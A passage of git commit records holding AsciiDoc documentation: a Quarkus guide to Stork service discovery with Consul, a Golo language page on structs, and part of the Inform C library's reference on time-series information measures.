example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `stork-quickstart` {quickstarts-tree-url}\/stork-quickstart[directory].\n\n== Discovery and 
selection\n\nBefore going further, we need to discuss discovery vs. selection.\n\n- Service discovery is the process of locating service instances.\nIt produces a list of service instances that is potentially empty (if no service matches the request) or contains multiple service instances.\n\n- Service selection, also called load-balancing, chooses the best instance from the list returned by the discovery process.\nThe result is a single service instance or an exception when no suitable instance can be found.\n\nStork handles both discovery and selection.\nHowever, it does not handle the communication with the service but only provides a service instance.\nThe various integrations in Quarkus extract the location of the service from that service instance.\n\nimage::stork-process.png[Discovery and Selection of services,width=50%, align=center]\n\n== Bootstrapping the project\n\nCreate a Quarkus project importing the quarkus-rest-client-reactive and quarkus-resteasy-reactive extensions using your favorite approach:\n\n:create-app-artifact-id: stork-quickstart\n:create-app-extensions: quarkus-rest-client-reactive,quarkus-resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nIn the generated project, also add the following dependencies:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.smallrye.stork<\/groupId>\n <artifactId>stork-service-discovery-consul<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.smallrye.reactive<\/groupId>\n <artifactId>smallrye-mutiny-vertx-consul-client<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.smallrye.stork:stork-service-discovery-consul\")\nimplementation(\"io.smallrye.reactive:smallrye-mutiny-vertx-consul-client\")\n----\n\n`stork-service-discovery-consul` provides an implementation of service discovery for Consul.\n`smallrye-mutiny-vertx-consul-client` is a Consul client which we will use to register our services in Consul.\n\n== The Blue and Red services\n\nLet's start with the very beginning: the service we will discover, select and call.\n\nCreate the `src\/main\/java\/org\/acme\/services\/BlueService.java` with the following content:\n\n[source, java]\n----\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class BlueService {\n\n @ConfigProperty(name = \"blue-service-port\", defaultValue = \"9000\") int port;\n\n \/**\n * Start an HTTP server for the blue service.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n vertx.createHttpServer()\n .requestHandler(req -> req.response().endAndForget(\"Hello from Blue!\"))\n .listenAndAwait(port);\n }\n}\n----\n\nIt creates a new HTTP server (using Vert.x) and implements our simple service when the application starts.\nFor each HTTP request, it sends a response with \"Hello from Blue!\" as the body.\n\nFollowing the same logic, create the `src\/main\/java\/org\/acme\/services\/RedService.java` with the following content:\n\n[source, java]\n----\n\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport 
io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class RedService {\n @ConfigProperty(name = \"red-service-port\", defaultValue = \"9001\") int port;\n\n \/**\n * Start an HTTP server for the red service.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n vertx.createHttpServer()\n .requestHandler(req -> req.response().endAndForget(\"Hello from Red!\"))\n .listenAndAwait(port);\n }\n\n}\n----\n\nThis time, it writes \"Hello from Red!\".\n\n== Service registration in Consul\n\nNow that we have implemented our services, we need to register them in Consul.\n\nNOTE: Stork is not limited to Consul and integrates with other service discovery mechanisms.\n\nCreate the `src\/main\/java\/org\/acme\/services\/Registration.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.ext.consul.ServiceOptions;\nimport io.vertx.mutiny.ext.consul.ConsulClient;\nimport io.vertx.ext.consul.ConsulClientOptions;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class Registration {\n\n @ConfigProperty(name = \"consul.host\") String host;\n @ConfigProperty(name = \"consul.port\") int port;\n\n @ConfigProperty(name = \"red-service-port\", defaultValue = \"9001\") int red;\n @ConfigProperty(name = \"blue-service-port\", defaultValue = \"9000\") int blue;\n\n \/**\n * Register our two services in Consul.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n ConsulClient client = ConsulClient.create(vertx, new ConsulClientOptions().setHost(host).setPort(port));\n\n client.registerServiceAndAwait(\n new ServiceOptions().setPort(red).setAddress(\"localhost\").setName(\"my-service\").setId(\"red\"));\n client.registerServiceAndAwait(\n new ServiceOptions().setPort(blue).setAddress(\"localhost\").setName(\"my-service\").setId(\"blue\"));\n }\n}\n----\n\nWhen the application starts, it connects to Consul using the Vert.x Consul Client and registers our two instances.\nBoth registrations use the same name (`my-service`) but different ids, to indicate that they are two instances of the same _service_.\n\n== The REST Client interface 
This is used to configure Stork discovery\n * and selection in the `application.properties` file.\n *\/\n@RegisterRestClient(baseUri = \"stork:\/\/my-service\")\npublic interface MyService {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n String get();\n}\n----\n\nIt's a straightforward REST client interface containing a single method. However, note the `baseUri` attribute.\nIt starts with `stork:\/\/`.\nIt instructs the REST client to delegate the discovery and selection of the service instances to Stork.\nNotice the `my-service` part in the URL.\nIt is the service name we will be using in the application configuration.\n\nIt does not change how the REST client is used.\nCreate the `src\/main\/java\/org\/acme\/FrontendApi.java` file with the following content:\n\n[source, java]\n----\npackage org.acme;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n\/**\n * A frontend API using our REST Client (which uses Stork to locate and select the service instance on each call).\n *\/\n@Path(\"\/api\")\npublic class FrontendApi {\n\n @RestClient MyService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String invoke() {\n return service.get();\n }\n\n}\n----\n\nIt injects and uses the REST client as usual.\n\n== Stork Filter\nThe `baseUri` configured in the REST client will be processed by `StorkClientRequestFilter` class, this is a https:\/\/quarkus.io\/specs\/jaxrs\/2.1\/index.html#filters[JAX-RS filter].\nIf you need to process the metadata associated with a message: HTTP headers, query parameters, media type, and other metadata, you can implement another filter to configure what you need.\nLet\u2019s implement a custom filter to add logging capability to our service. We create `CustomLoggingFilter` and annotating it with the @Provider annotation:\n\n[source, java]\n----\npackage org.acme;\n\nimport io.vertx.core.http.HttpServerRequest;\nimport org.jboss.logging.Logger;\nimport org.jboss.resteasy.reactive.client.spi.ResteasyReactiveClientRequestContext;\nimport org.jboss.resteasy.reactive.client.spi.ResteasyReactiveClientRequestFilter;\n\nimport javax.ws.rs.ext.Provider;\n\n@Provider\npublic class CustomLoggingFilter implements ResteasyReactiveClientRequestFilter {\n\n private static final Logger LOG = Logger.getLogger(CustomLoggingFilter.class);\n\n @Override\n public void filter(ResteasyReactiveClientRequestContext requestContext) {\n LOG.infof(\"Resolved address by Stork: %s\",requestContext.getUri().toString());\n }\n}\n----\n\nThe order in which filters are executed is defined by https:\/\/quarkus.io\/specs\/jaxrs\/2.1\/index.html#priorities[Priorities].\nNote that `CustomLoggingFilter` is using a default value, so the user-level priority and the `StorkClientRequestFilter` uses the security authentication filter priority. This means that `StorkClientRequestFilter` will be executed before our `CustomLoggingFilter`.\nUse `@Priority` annotation to change this behaviour.\n\n\n== Stork configuration\n\nThe system is almost complete. 
\n== Stork configuration\n\nThe system is almost complete. We only need to configure Stork and the `Registration` bean.\n\nIn the `src\/main\/resources\/application.properties`, add:\n\n[source, properties]\n----\nconsul.host=localhost\nconsul.port=8500\n\nquarkus.stork.my-service.service-discovery.type=consul\nquarkus.stork.my-service.service-discovery.consul-host=localhost\nquarkus.stork.my-service.service-discovery.consul-port=8500\nquarkus.stork.my-service.load-balancer.type=round-robin\n----\n\nThe first two lines provide the Consul location used by the `Registration` bean.\n\nThe other properties are related to Stork.\n`quarkus.stork.my-service.service-discovery.type` indicates which type of service discovery we will be using to locate the `my-service` service.\nIn our case, it's `consul`.\n`quarkus.stork.my-service.service-discovery.consul-host` and `quarkus.stork.my-service.service-discovery.consul-port` configure the access to Consul.\nFinally, `quarkus.stork.my-service.load-balancer.type` configures the service selection.\nIn our case, we use a `round-robin`.\n\n== Running the application\n\nWe're done!\nSo, let's see if it works.\n\nFirst, start Consul:\n\n[source, shell script]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nIf you start Consul differently, do not forget to edit the application configuration.\n\nThen, package the application:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nAnd run it:\n\n[source, shell script]\n----\n> java -jar target\/quarkus-app\/quarkus-run.jar\n----\n\nIn another terminal, run:\n\n[source, shell script]\n----\n> curl http:\/\/localhost:8080\/api\n...\n> curl http:\/\/localhost:8080\/api\n...\n> curl http:\/\/localhost:8080\/api\n...\n----\n\nThe responses alternate between `Hello from Red!` and `Hello from Blue!`.\n\nYou can compile this application into a native executable:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAnd start it with:\n\n[source, shell script]\n----\n> .\/target\/stork-getting-started-1.0.0-SNAPSHOT-runner\n----\n\n== Going further\n\nThis guide has shown how to use SmallRye Stork to discover and select your services.\nYou can find more about Stork in:\n\n- the xref:stork-reference.adoc[Stork reference guide],\n- the https:\/\/smallrye.io\/smallrye-stork[SmallRye Stork website].\n","old_contents":""
,"returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4be3e61bc0e80a641987c9df9adebe8b4cadff3","subject":"Documentation for private struct members","message":"Documentation for private struct members\n","repos":"dynamid\/golo-lang-insa-citilab-historical-reference,dynamid\/golo-lang-insa-citilab-historical-reference,titimoby\/golo-lang,titimoby\/golo-lang,smarr\/golo-lang,smarr\/golo-lang,dynamid\/golo-lang-insa-citilab-historical-reference","old_file":"doc\/structs.asciidoc","new_file":"doc\/structs.asciidoc","new_contents":"== Structs ==\n\nGolo allows the definition of simple structures using the `struct` keyword. They resemble structures\nin procedural languages such as C `struct` or Pascal *records*. They are useful to store data when\nthe set of named entries is fixed.\n\n=== Definition ===\n\nStructures are defined at the module level:\n\n----\nmodule sample\n\nstruct Person = { name, age, email }\n\nfunction main = |args| {\n let p1 = Person(\"Mr Bean\", 54, \"bean@gmail.com\")\n println(p1: name())\n let p2 = Person(): name(\"John\"): age(32): email(\"john@b-root.com\")\n println(p2: age())\n}\n----\n\nDeclaring a structure also defines two factory functions: one with no arguments, and one\nwith all arguments in their order of declaration in the `struct` statement. When not initialized,\nmember values are `null`.\n\nEach member yields a *getter* and a *setter* method: given a member `a`, the getter is method `a()`\nwhile the setter is method `a(newValue)`. It should be noted that setter methods return the\nstructure instance, which makes it possible to chain calls as illustrated in the previous example\nwhile building `p2`.\n\n=== JVM existence ===\n\nEach `struct` is compiled to a self-contained JVM class.\n\nGiven:\n\n----\nmodule sample\n\nstruct Point = { x, y }\n----\n\na class `sample.types.Point` is being generated.\n\nIt is important to note that:\n\n1. each `struct` class is `final`,\n2. each `struct` class inherits from `gololang.GoloStruct`,\n3. proper definitions of `toString()`, `hashCode()` and `equals()` are being provided.\n\n=== `toString()` behavior ===\n\nThe `toString()` method is being overridden to provide a meaningful description of a structure's\ncontent.\n\nGiven the following program:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n println(Point(1, 2)) \n}\n----\n\nrunning it prints the following console output:\n\n----\nstruct Point{x=1, y=2}\n----\n\n=== Immutable structs ===\n\nStructure instances are mutable by default. Golo generates a factory function with the `Immutable`\nprefix to directly build immutable instances:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n\n let p = ImmutablePoint(1, 2)\n println(p)\n\n try {\n # Fails! 
(p is immutable)\n p: x(100)\n } catch (expected) {\n println(expected: getMessage())\n }\n}\n----\n\n=== Copying ===\n\nInstances of a structure provide copying methods:\n\n- `copy()` returns a *shallow* copy of the structure instance, and\n- `frozenCopy()` returns a read-only *shallow* copy.\n\nTrying to invoke any setter methods on an instance obtained through `frozenCopy()` raises a\n`java.lang.IllegalStateException`.\n\nIMPORTANT: The result of calling `copy()` on a frozen instance **is a mutable** copy, not a frozen\ncopy.\n\n=== `equals()` and `hashCode()` semantics ===\n\nGolo structures honor the contract of Java objects regarding equality and hash codes.\n\nBy default, `equals()` and `hashCode()` are the ones of `java.lang.Object`. Indeed, structure\nmembers can be changed, so they cannot be used to compute stable values.\n\nNevertheless, structure instances returned by `frozenCopy()` have stable members, and in that case\nthe members are used to compute equality and hash codes.\n\nConsider the following program:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n \n let p1 = Point(1, 2)\n let p2 = Point(1, 2)\n let p3 = p1: frozenCopy()\n let p4 = p1: frozenCopy()\n\n println(\"p1 == p2 \" + (p1 == p2))\n println(\"p1 == p3 \" + (p1 == p3))\n println(\"p3 == p4 \" + (p3 == p4))\n\n println(\"#p1 \" + p1: hashCode())\n println(\"#p2 \" + p2: hashCode())\n println(\"#p3 \" + p3: hashCode())\n println(\"#p4 \" + p4: hashCode())\n}\n----\n\nthe console output is the following:\n\n----\np1 == p2 false\np1 == p3 false\np3 == p4 true\n#p1 1555845260\n#p2 104739310\n#p3 994\n#p4 994\n----\n\nTIP: It is recommended that you use `Immutable<name of struct>(...)` or `frozenCopy()` when you can,\nespecially when storing values into collections.\n\n=== Helper methods ===\n\nA number of helper methods are being generated:\n\n- `members()` returns a tuple of the member names,\n- `values()` returns a tuple with the current member values,\n- `isFrozen()` returns a boolean to check for frozen structure instances,\n- `iterator()` provides an iterator over a structure where each element is a tuple `[member, value]`,\n- `get(name)` returns the value of a member by its name,\n- `set(name, value)` updates the value of a member by its name, and returns the same structure.\n\n=== Private members ===\n\nBy default, all members in a struct can be accessed. It is possible to make some elements private by\nprefixing them with `_`, as in:\n\n----\nstruct Foo = { a, _b, c }\n\n# (...)\n\nlet foo = Foo(1, 2, 3)\n----\n\nIn this case, `_b` is a private struct member. This means that `foo: _b()` and `foo: _b(666)` are\nvalid calls only if made from:\n\n- a function from the declaring module, or\n- an augmentation defined in the declaring module.\n\nAny call to, say, `foo: _b()` from another module will yield a `NoSuchMethodError` exception.\n\nPrivate struct members also have the following impact:\n\n- they do not appear in `members()` and `values()` calls, and\n- they are not iterated through `iterator()`-provided iterators, and\n- they are being used like other members in `equals()` and `hashCode()`, and\n- they do not appear in `toString()` representations.\n
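\nFor instance, here is a sketch of both allowed access paths (the module and member names are illustrative):\n\n----\nmodule sample\n\nstruct Foo = { a, _b, c }\n\n# allowed: a function in the declaring module\nfunction peek = |foo| -> foo: _b()\n\n# allowed: an augmentation defined in the declaring module\naugment sample.types.Foo {\n function b = |this| -> this: _b()\n}\n\nfunction main = |args| {\n let foo = Foo(1, 2, 3)\n println(peek(foo)) # prints 2\n println(foo: b()) # prints 2\n}\n----\n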
","old_contents":"","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"61b37e38d626c19fc84ec2977a10bf616b15b44f","subject":"Remove garbage in PID documentation","message":"Remove garbage in PID documentation\n","repos":"dglmoore\/Inform,dglmoore\/Inform,ELIFE-ASU\/Inform,ELIFE-ASU\/Inform","old_file":"docs\/timeseries.adoc","new_file":"docs\/timeseries.adoc","new_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. These local variants have names similar to their averaged or global counterparts,\ne.g. <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a stem:[k]-blocks) of the\ntime series, e.g. 
stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is as simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray with each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallow the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the user incrementally\nconstruct the distributions. This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names where possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The history length\n\n| `err`\n| An error argument\n|===\n
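\nTo make the row-major layout concrete, here is a minimal sketch of how two initial conditions are packed into one contiguous array; it reuses the two-initial-condition active information example from the next section (the `inform\/active_info.h` header path is an assumption based on the library's layout), so only the indexing commentary is new:\n\n[source,c]\n----\n#include <assert.h>\n#include <inform\/active_info.h>\n\nint main(void)\n{\n    inform_error err = INFORM_SUCCESS;\n    \/\/ n = 2 initial conditions, m = 9 time steps; initial condition i,\n    \/\/ time step j lives at series[i*m + j]\n    int const series[18] = {0,0,1,1,1,1,0,0,0,   \/\/ row 0: series[0..8]\n                            1,0,0,1,0,0,1,0,0};  \/\/ row 1: series[9..17]\n    double ai = inform_active_info(series, 2, 9, 2, 2, &err);\n    assert(inform_succeeded(&err));\n    \/\/ ai ~ 0.359879, as in the example below\n    return 0;\n}\n----\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. 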
local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was statically allocated in this scope\n\/\/ free(ai);\n----\n****\n\n[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\\sum_{x_i^{(k)}} p(x_i^{(k)}) \\log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error 
*err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_block_entropy(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\nfree(h);\n\n\/\/ k == 2\nh = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\nfree(h);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was statically allocated in this scope\n\/\/ free(h);\n----\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \\sum_{x_i,y_i} p(x_i,y_i) \\log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n
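\nBefore the function reference, a sanity check may be helpful: conditional entropy obeys the chain rule stem:[H(Y|X) = H(X,Y) - H(X)]. The following freestanding sketch (plain C over hand-counted empirical distributions, not a call into the *Inform* API) verifies the identity for the example pair used below:\n\n[source,c]\n----\n#include <math.h>\n#include <stdio.h>\n\nint main(void)\n{\n    int const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\n    int const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n    double joint[2][2] = {{0,0},{0,0}}, px[2] = {0,0};\n    for (int i = 0; i < 20; ++i)\n    {\n        joint[xs[i]][ys[i]] += 0.05; \/\/ each observation carries weight 1\/20\n        px[xs[i]] += 0.05;\n    }\n    double hxy = 0.0, hx = 0.0;\n    for (int x = 0; x < 2; ++x)\n    {\n        if (px[x] > 0) hx -= px[x] * log2(px[x]);\n        for (int y = 0; y < 2; ++y)\n            if (joint[x][y] > 0) hxy -= joint[x][y] * log2(joint[x][y]);\n    }\n    printf(\"H(Y|X) = %f\\n\", hxy - hx); \/\/ ~ 0.597107, matching the example below\n    return 0;\n}\n----\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. 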
It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.507757\n----\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = 